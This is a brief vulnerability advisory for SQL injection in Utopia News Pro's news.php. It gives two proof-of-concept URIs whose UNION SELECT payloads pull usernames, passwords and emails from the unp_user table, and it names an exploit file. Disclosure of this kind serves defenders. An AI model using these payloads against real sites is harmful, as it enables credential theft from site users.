Utopia News Pro SQL Injection Vulnerability

Utopia News Pro SQL Injection Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/[path]/news.php?action=printable&newsid=%27%20UNION%20SELECT%20null,'20051007',username,password,null,email,null%20FROM%20unp_user%20WHERE%20userid=1/*

The following proof of concept URI for versions prior to version 1.1.3 is available:
http://www.example.com/[path]/news.php?action=printable&newsid=%27%20UNION%20SELECT%20null,'20051007',username,password,null,email%20FROM%20unp_user%20WHERE%20u
serid=1/*

The following exploit code is also available:

/data/vulnerabilities/exploits/utopia_xpl.php